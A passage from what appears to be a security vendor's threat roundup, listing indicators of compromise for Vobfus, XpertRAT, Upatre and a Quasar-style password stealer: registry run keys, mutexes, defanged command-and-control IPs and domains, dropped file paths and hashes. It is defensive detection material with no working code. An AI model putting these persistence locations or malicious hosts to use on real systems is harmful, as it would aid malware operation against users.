70dc1946d77ef19522ccc9d18629e8777283a715d3fa055ff7f0559331db3e26 81c603712c753de8200c0cb6dd28d6b37ac2873b968bdf8929ca129d35195d4a ac2b7c9be4cf9cf5b2e4a564a5fa312243e665dd31463448c975f38664de56f2 ca1e6ff31df37242aa2e09a4cb29b7546dd408c0b0de26dd2a946183eea64b95 d676ecd3750ce75f42ed0c6958863e01ffbf92b5169c1899513b0affc952b9de dfe5f28fde5c483ba38aff7def0df3938ae4837acb81cba696f57159fa6fa0b6 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### 
AMP\n\n[](<https://1.bp.blogspot.com/-gV0Kg_wsci0/XitO7DAGmCI/AAAAAAAADK4/3Bom7M6r2bUku4gUhx64U6HUOjRzwII8wCLcBGAsYHQ/s1600/ac2b7c9be4cf9cf5b2e4a564a5fa312243e665dd31463448c975f38664de56f2_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-NaI3QAoenqI/XitO_Iz5IVI/AAAAAAAADK8/UYM3l_MHlbgV-BpasI6bQorRu1zC3S6swCLcBGAsYHQ/s1600/ac2b7c9be4cf9cf5b2e4a564a5fa312243e665dd31463448c975f38664de56f2_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-FsJjlnWcGqE/XitPEf3ivLI/AAAAAAAADLA/zKf79XkTJeE2rLbSMz60SumpCzd2b2MaACLcBGAsYHQ/s1600/ac2b7c9be4cf9cf5b2e4a564a5fa312243e665dd31463448c975f38664de56f2_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Worm.Vobfus-7541859-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN ` | 12 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN ` | 12 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: WindowsDefender ` | 7 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: WindowsDefender ` | 7 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: WindowsDefender ` | 7 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: WindowsDefender ` | 7 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: update ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: update ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: update ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: update ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: BWOJ39VGEPRBJ ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: BWOJ39VGEPRBJ ` | 1 
\n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: BWOJ39VGEPRBJ ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: BWOJ39VGEPRBJ ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: IOAUWN4A3W4AA ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: IOAUWN4A3W4AA ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: IOAUWN4A3W4AA ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: IOAUWN4A3W4AA ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 8L9ROXIFMECH6 ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 8L9ROXIFMECH6 ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: 8L9ROXIFMECH6 ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: 8L9ROXIFMECH6 ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: HE8MRP3X92SVO ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: HE8MRP3X92SVO ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: HE8MRP3X92SVO ` | 1 \nMutexes | Occurrences \n---|--- \n`<random, matching [a-zA-Z0-9]{5,9}>` | 7 \n`HCQZLMB9VOLD` | 1 \n`1HZYRMUIRQ` | 1 \n`REYUIW9NA8LY` | 1 \n`bv1lr78956835` | 1 \n`MUA192KRR0N` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`172[.]217[.]11[.]46` | 2 \n`172[.]217[.]9[.]206` | 2 \n`188[.]138[.]114[.]61` | 1 \n`178[.]128[.]111[.]183` | 1 \n`77[.]79[.]13[.]204` | 1 \n`195[.]201[.]196[.]115` | 1 \nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`www[.]altervista[.]org` | 1 \n`divine-vps[.]com` | 1 \n`moddersondazone[.]net` | 1 \n`khant[.]info` | 1 \n`applesupportforums[.]com` | 1 \n`underground-logs[.]tk` | 1 \n`www[.]emmek[.]altervista[.]org` | 1 \n`khant[.]me` | 1 \n`imscuh[.]com` | 1 \n`rtrforums[.]com` | 1 \n`tripsschool[.]netfirms[.]com` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\windefender.exe.jpg` | 6 \n`%TEMP%\\update.exe.jpg` | 1 \n`%TEMP%\\8c5gucto.exe.jpg` | 1 \n`%TEMP%\\f5qrnr2jfk.exe.jpg` | 1 \n`%TEMP%\\52qof1hoy2.exe.jpg` | 1 \n`%TEMP%\\dvpiit26.exe.jpg` | 1 \n`%TEMP%\\windefender.jpg` | 1 \n \n#### File Hashes\n\n` 171ab79cd58e2be6aeada2c137c8ab74eecf082ae2a80358e84fccd254bf760b 312b904aa6b90418558a7e9b8d25ad1f84a2ae413e542fb6a06b7aae9567957d 39154850d888f42f4a04fc19887691101aadda306311605b59aa0997ae9fd4cc 3bd1ed52b57837cbc2b072c23f9de501a7d0ed5bd3ce93d3ca7022aada5ea13f 4ca9d8cd2b950485301fb885cc1d954e7c91c03c4fd21209fe90d68426a0b073 594e3dde160ff061cabb630e7c6d8c9584e45f61bc446b03e3546d2104b25d1a 59656eb7ffde7b461f49735aa9717ab09ff883780522afa1de8d724928108b75 80f8410a8f0042edad98dc1636d6cbd6c989d5159454d86fc212eb647d413850 87a2371dc38ca7b11010496c3e4c908379596ddbd5b2eb0332817a8d18e71ea0 a92e67a93899f548c68b5d667650b0749a7ff56799ba7afd5d393bef97f946a5 e487727b0d5121e8efc6f51ffe24ce54e40f923b0d9916284b988efc4a57269e eb03d095df6d765469d088cefbd320b6cee40bc97cf1bd75ad46a115f2d3697b `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-i4w2NhZknaE/XitPRG7gQtI/AAAAAAAADLM/j-LXoTebdAQevwuPUoO_eYjqiHOPYOz-ACLcBGAsYHQ/s1600/a92e67a93899f548c68b5d667650b0749a7ff56799ba7afd5d393bef97f946a5_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### 
Win.Trojan.XpertRAT-7550253-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM \nValue Name: EnableLUA ` | 13 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: UACDisableNotify ` | 13 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\X ` | 13 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN ` | 13 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5 ` | 13 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5 ` | 13 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5 ` | 13 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\X\\RUN ` | 13 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\X\\RUN \nValue Name: NOME ` | 13 \nMutexes | Occurrences \n---|--- \n`P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5` | 13 \nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`joeing[.]dnsfor[.]me` | 13 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\Administrator.bmp` | 13 \n`%APPDATA%\\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5` | 13 \n`%APPDATA%\\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5\\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5` | 13 \n`%APPDATA%\\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5\\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5.exe` | 13 \n`%APPDATA%\\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5\\ut` | 13 \n`%TEMP%\\Westminster8.exe` | 13 \n \n#### File Hashes\n\n` 2bc7aa28fb4cab2aa55e683fa452125a29fdeaf2c8a8ad09801581ac164f6e04 33151408dca938762e705906a4da851f01d38e05ea539bc4a6b56745d1464933 3464a96f3efe37c2c852c581576c75b5f7fce51e06473317e3a927867959cd9e 395a63b07a1275522ed8867d6402abba3b81bfcafedfdd4cc42d9d7b12b03868 45df177c92177a1766adb8e57b49b588f80d5534a84f0fc91d3ce296c7793052 75dc81fe9a84e7abecc35834a59574fa6975df9dafede10ec32090c054b2a7e4 8cd515edb041f9591d71885cf5e51253f9c0569fcfae06a73e14dbfef7d6f5ef 964354f86010cf35a07fc0e8ac11c0e653409338c42cfc132d8876b0fc64d3e7 a78e29a18072a0287261c696aac850b3a2f67087e1167f7b867eff84075655ab ab4e72ae86ecc5ec5fd7fe5e727ebc069c4803fd34e975c6054fa85cf4a73f8a af2f58c80a13d01953ff089503666772bbafa371fe61eadd8561aca0026ff856 ce56803cae1069908fc47087d6d8fbd1278ae72bc36966694e35da564822446e dc5771d054a00e41f0cceb59ab59bf154b5e56d6fbff9db7a2713a5728254bbb `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-Fd5X3JcT4pA/XitPhSd5vRI/AAAAAAAADLY/9a9jN4DUEqUNsyPZh3UMuLH3JbNgJD9JgCLcBGAsYHQ/s1600/af2f58c80a13d01953ff089503666772bbafa371fe61eadd8561aca0026ff856_amp.png>)\n\n \n\n\n#### 
ThreatGrid\n\n[](<https://1.bp.blogspot.com/-VWcRyD5neiQ/XitPlU8bQFI/AAAAAAAADLc/24DqGS6JuB8sBCmQvZHVodc-25GmClNOQCLcBGAsYHQ/s1600/af2f58c80a13d01953ff089503666772bbafa371fe61eadd8561aca0026ff856_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Trojan.Upatre-7549404-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: a2fc9eb ` | 8 \nMutexes | Occurrences \n---|--- \n`qazwsxedc` | 9 \n`Local\\MSCTF.Asm.Mutexsssssssssssss1` | 8 \n`Local\\MSCTF.CtfMonitorInstMutexsssssssssssss1` | 8 \n`Global\\b54c4621-3b1b-11ea-a007-00501e3ae7b5` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`93[.]118[.]36[.]235` | 8 \n`197[.]255[.]147[.]146` | 8 \n`136[.]243[.]69[.]220` | 8 \n`81[.]169[.]145[.]67` | 8 \n`178[.]254[.]50[.]156` | 8 \n`202[.]172[.]26[.]26` | 8 \n`134[.]0[.]11[.]125` | 8 \n`157[.]7[.]107[.]174` | 8 \n`213[.]186[.]33[.]3` | 7 \n`46[.]105[.]57[.]169` | 7 \n`166[.]62[.]113[.]120` | 7 \n`46[.]30[.]215[.]33` | 7 \n`212[.]48[.]68[.]63` | 7 \n`208[.]117[.]38[.]143` | 7 \n`5[.]39[.]73[.]158` | 7 \n`3[.]114[.]58[.]184` | 6 \n`37[.]58[.]63[.]231` | 6 \n`81[.]19[.]159[.]64` | 6 \n`198[.]199[.]67[.]86` | 6 \n`185[.]227[.]80[.]58` | 6 \n`211[.]1[.]226[.]76` | 3 \n`192[.]35[.]177[.]64` | 2 \n`203[.]189[.]109[.]240` | 2 \n`213[.]186[.]33[.]87` | 1 \n`46[.]166[.]187[.]64` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`schema[.]org` | 8 \n`api[.]w[.]org` | 8 \n`gmpg[.]org` | 8 \n`recaswine[.]ro` | 8 \n`pendletonforhouse[.]com` | 8 \n`ecocalsots[.]com` | 8 \n`www[.]riesa[.]de` | 8 \n`gestes-argile[.]com` | 8 \n`feuerwehr-stadt-riesa[.]de` | 8 \n`treatneuro[.]com` | 8 \n`national-drafting[.]com` | 8 \n`dupdiesel[.]co[.]za` | 8 \n`has-gulvakfi[.]com` | 8 \n`domaine-cassillac[.]com` | 8 \n`cerenalarmkamera[.]com` | 8 \n`definitionen[.]de` | 8 \n`eatside[.]es` | 8 \n`takatei[.]com` | 8 \n`www[.]takatei[.]com` | 8 \n`themeisle[.]com` | 7 \n`www[.]ovh[.]co[.]uk` | 7 \n`plexipr[.]com` | 7 \n`paintituppottery[.]com` | 7 \n`viralcrazies[.]com` | 7 \n`camlavabolari[.]com` | 7 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\Start Menu\\Programs\\Startupx\\system.pif` | 8 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startupx\\system.pif` | 8 \n`%APPDATA%\\a2fc9eb` | 8 \n`%APPDATA%\\a2fc9eb\\ea2fc9.exe` | 8 \n`%APPDATA%\\8ddb21f\\88ddb2.exe` | 5 \n`%HOMEPATH%\\HELP_FILE_430D48DC3.png` | 1 \n`%HOMEPATH%\\HELP_FILE_530D48DC3.html` | 1 \n`%HOMEPATH%\\HELP_FILE_530D48DC3.png` | 1 \n`%HOMEPATH%\\HELP_FILE_630D48DC3.html` | 1 \n`%HOMEPATH%\\HELP_FILE_630D48DC3.png` | 1 \n`%HOMEPATH%\\HELP_FILE_730D48DC3.html` | 1 \n`%HOMEPATH%\\HELP_FILE_730D48DC3.png` | 1 \n`%HOMEPATH%\\HELP_FILE_830D48DC3.html` | 1 \n`%HOMEPATH%\\HELP_FILE_830D48DC3.png` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\HELP_FILE_130D48DC3.html` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\HELP_FILE_130D48DC3.png` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\HELP_FILE_230D48DC3.html` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\HELP_FILE_230D48DC3.png` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\HELP_FILE_330D48DC3.html` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\HELP_FILE_330D48DC3.png` | 1 \n`%HOMEPATH%\\Local Settings\\Application 
Data\\HELP_FILE_430D48DC3.html` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\HELP_FILE_430D48DC3.png` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\HELP_FILE_530D48DC3.html` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\HELP_FILE_530D48DC3.png` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\HELP_FILE_630D48DC3.html` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 04e7c9d7cb59d57085636e06d1e30098ab81f85805bc9ac6c4c9270d697d6e96 434ff7bfd6a752f3c56c20d8a7e8853a94e99be9d112442eed257ee42800e957 49a97e5e68d188e423af3eebe2b3a62d2a285006d42c5dfd10cfdbe534534c91 61e76a0e801cb7a30221f4075ec8c5fc733cc7b3d5bda520551b8bd053f101d2 8f237cc28360ef130227b92323a986c3136242600fc2188b92c48fad5df2f7fe 98db4c353cc79a3b9bfae516ab56fab19166d2fed1f108cbff33447cc2feac33 a27d8ad3e0ef1d792cc6504a41d3eaecf11802d03fdbfb08c811217759f2d965 de940e24beca778c6d8afd8b625eeaff0549342ce061fd75ce817d2d5add612c e67b98c9041d13d17904f65f875e840c7f40cbf60fdc25c0767fefc5c57cb634 eccb6d79ce6669a5e4fb1f394f920224fe40d0dd782c8dd12cf4004c81c32765 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/--gH0fgsBuvg/XitP6mbuwEI/AAAAAAAADLo/x5bZ5eRZZLs3BOF3YTpnC6Uqj_Yx2cFrACLcBGAsYHQ/s1600/04e7c9d7cb59d57085636e06d1e30098ab81f85805bc9ac6c4c9270d697d6e96_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-DmERPFrZuX0/XitP-qGIHNI/AAAAAAAADLs/BII7BCDux3Mem3FsI6v9tUjcuy4XlYRLQCLcBGAsYHQ/s1600/04e7c9d7cb59d57085636e06d1e30098ab81f85805bc9ac6c4c9270d697d6e96_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-PxNRLnZXhds/XitQFKfOmWI/AAAAAAAADLw/PWWWGLn0Ec45CrbpBkDetWktWeu2fx2tQCLcBGAsYHQ/s1600/434ff7bfd6a752f3c56c20d8a7e8853a94e99be9d112442eed257ee42800e957_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### 
Win.Packed.Passwordstealera-7544289-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Quasar Client Startup ` | 12 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: java ` | 4 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Java ` | 4 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: error pending ` | 2 \n`<HKCR>\\LOCAL SETTINGS\\MUICACHE\\\\52C64B7E \nValue Name: LanguageList ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Windows startup ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: NET framework ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: steam ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\SCHEDULE\\TASKCACHE\\\\WINDOWS \nValue Name: Id ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\SCHEDULE\\TASKCACHE\\\\WINDOWS \nValue Name: Index ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: NvDisplay ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Windows Defender ` | 1 \nMutexes | Occurrences \n---|--- \n`SwHHcMzPFPnmaghyKW` | 2 \n`ymJAxrWzIz9Lmt1RL3` | 2 \n`UuCyPSySUiFSDdHPtO` | 2 \n`sFWQsTLv8c5vk4jyO0` | 1 \n`tsgtBnaQMyDFZrUQIp` | 1 \n`YsyBq3MBwCzQNk2qhM` | 1 \n`q624fQPLA3sreuCLzt` | 1 \n`N3og1f8lHLVNu6W30c` | 1 \n`KckvHhqL1uihc4dCLw` | 1 \n`RTzXcJcD26j9cGndLe` | 1 \n`9uxtMjacj46ojfxw8Z` | 1 \n`tmiYIVMkI1dD9zfRjT` | 1 \n`hI0uR11aF8XGlij0wp` | 1 \n`fJO2dbxEGn2ZNnVHEj` | 1 \n`zqUBYqdAinRE5xYguS` | 1 \n`RtX4BZD2nWkVu0prSe` | 1 \n`HjjzZQZESOkAInyZch` | 1 \n`cP20H0tkmTiytEkIEL` | 1 \n`ixlUgkBMIocn8A96xU` | 1 \n`yIKLaGMppBM6EDhhvU` | 1 \n`mLvIMV7J1hOyksFGvj` | 1 \n`hj0AV9bM5BIleznxOc` | 1 \n`UQjK2wv6weKFSvAPxM` | 1 \n`UrlxbiSJX7lUOpSRZs` | 1 \n`JsMa39ctmfwcdenPhN` | 1 \n \n*See JSON for more 
IOCs\n\nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`208[.]95[.]112[.]1` | 52 \n`37[.]8[.]73[.]90` | 2 \n`192[.]69[.]169[.]25` | 1 \n`103[.]43[.]75[.]105` | 1 \n`3[.]14[.]212[.]173` | 1 \n`3[.]19[.]114[.]185` | 1 \n`18[.]188[.]14[.]65` | 1 \n`103[.]136[.]43[.]131` | 1 \n`103[.]73[.]67[.]70` | 1 \n`74[.]118[.]139[.]67` | 1 \n`213[.]183[.]58[.]52` | 1 \n`141[.]255[.]158[.]23` | 1 \n`80[.]66[.]255[.]129` | 1 \n`95[.]59[.]113[.]113` | 1 \n`109[.]230[.]215[.]181` | 1 \n`185[.]248[.]100[.]84` | 1 \n`95[.]156[.]232[.]34` | 1 \n`88[.]150[.]227[.]112` | 1 \n`23[.]249[.]161[.]111` | 1 \n`36[.]84[.]57[.]230` | 1 \n`36[.]84[.]56[.]39` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`ip-api[.]com` | 52 \n`swez111[.]ddns[.]net` | 5 \n`scammer[.]chickenkiller[.]com` | 2 \n`holaholahola[.]hopto[.]org` | 2 \n`chrome[.]giize[.]com` | 2 \n`niroshimax[.]zapto[.]org` | 2 \n`0[.]tcp[.]ngrok[.]io` | 1 \n`gingles[.]ddns[.]net` | 1 \n`dhayan[.]ddns[.]net` | 1 \n`sanchosec[.]ddns[.]net` | 1 \n`apina123[.]duckdns[.]org` | 1 \n`mlks[.]ddns[.]net` | 1 \n`update1337[.]duckdns[.]org` | 1 \n`ord` | 1 \n`dike[.]duckdns[.]org` | 1 \n`nirovitch[.]zapto[.]org` | 1 \n`nume123[.]hopto[.]org` | 1 \n`pilnaspuodas[.]ddns[.]net` | 1 \n`danek56[.]ddns[.]net` | 1 \n`windows13467[.]ddns[.]net` | 1 \n`backtofuture[.]zapto[.]org` | 1 \n`nerdicon[.]ddns[.]net` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\Logs` | 35 \n`%APPDATA%\\Logs\\01-17-2020` | 35 \n`%APPDATA%\\SubDir` | 28 \n`%System32%\\Tasks\\WINDOWSSYSTEMHOST` | 22 \n`%APPDATA%\\SubDir\\Client.exe` | 18 \n`%System32%\\Tasks\\Quasar Client Startup` | 8 \n`%APPDATA%\\<random, matching '[A-Z][a-z]{3,5}\\[a-z]{4,6}'>.exe` | 8 \n`E:\\autorun.inf` | 7 \n`\\autorun.inf` | 7 \n`%System32%\\Tasks\\java` | 4 \n`%APPDATA%\\<random, matching '[a-z0-9]{3,7}'>` | 4 \n`%APPDATA%\\SubDir\\WinUpdate.exe` | 2 
\n`%SystemRoot%\\SysWOW64\\java64` | 2 \n`%SystemRoot%\\SysWOW64\\java64\\java.exe` | 2 \n`%System32%\\Tasks\\error pending ` | 2 \n`%APPDATA%\\SubDir\\fileintl.exe` | 2 \n`%System32%\\Tasks\\Windows Defender` | 1 \n`%System32%\\Tasks\\Windows` | 1 \n`%System32%\\Tasks\\Windows startup` | 1 \n`%System32%\\Tasks\\WinSql` | 1 \n`%APPDATA%\\SubDir\\WinSql1.exe` | 1 \n`%System32%\\Tasks\\NET framework` | 1 \n`%ProgramFiles(x86)%\\SubDir` | 1 \n`%ProgramFiles(x86)%\\SubDir\\Client.exe` | 1 \n`%System32%\\Tasks\\RDPBlox Agent` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 02c9df3dec221cacfa6c97e91bee174af3022dac4588e3f494108b0cc5c9fe1e 03fa8b9de359535afb3af2914e2bd91d630b85a0596604501968b12f9187b1da 0624f9670f56e83ab5bbdf903879ffd0facb5b27b4bc53d16f5d4a560033cdf8 0668b26c7ab4e7adbdf98d515b0a58ae06f5e89d67e5c9fa02a9ee7bea8a477a 09666ba370e36246342d7093b6c63b5a8ef10966fa78b79bcf570659a0dd2f77 0c598a620e83a6e0ee892aa5090e2dbbf36dde886620647be8c27bab0b94859e 0ed3feae6696b3986ae492d85fef56e2ec226d7b010154470b433bfc357f861b 189c7ebae4cdd338f844ba5adc3ecc322294a7be438a3a72eea69468ac068eb3 192a0440574068fd9297086e0cf05a57d8ae4af03045d6be4c0b4f21bd636a72 19b8ed7ab551d89467c665ee7f509fe3ece9101679b5302cdc70c6d3a8c12ee6 26f294e691ec271d761a167704d495ca8bdc4d66cb0cd332a0e49313164988b1 27473eaee1e66c3a9581d17b4ff94d481c31f23032b810493d99a23eebee6b22 29f55d706d0e7390d7e77aceae79909654b4868179ff6913f28d78df945a5a51 2b3eb6cf09691b169c603cbeba508c4056eb6c8d1f12abe11b3c11c77b130604 2d3cef89943a95c57418be1996431f9803c6df4a9307d1890a3885c8794986af 3068250bcb0e8ffcee254c2da91e2696703bf36cfb195415aa3b0c454601dad1 3204ad689f3939402dae9670970c55c684b559ce1a8ba5726eb3e143a0beea4a 3622a2b3adfc7cbc7727a7a13dc6c895290c6f6fc93c8e64e753e2041cafed16 362ec0bc0738f083dcdbf9472ebf4e6227b33d093c9dacf1093607fa3b53ea01 38c56bc6885e546caab8faa8f9b75a6b1d82a60f686038ccaf72f148187fb1ee 3baa2fb31a69683a134a24d5a5a05aa1619ce65ba9811e34d254a5efd708580c 
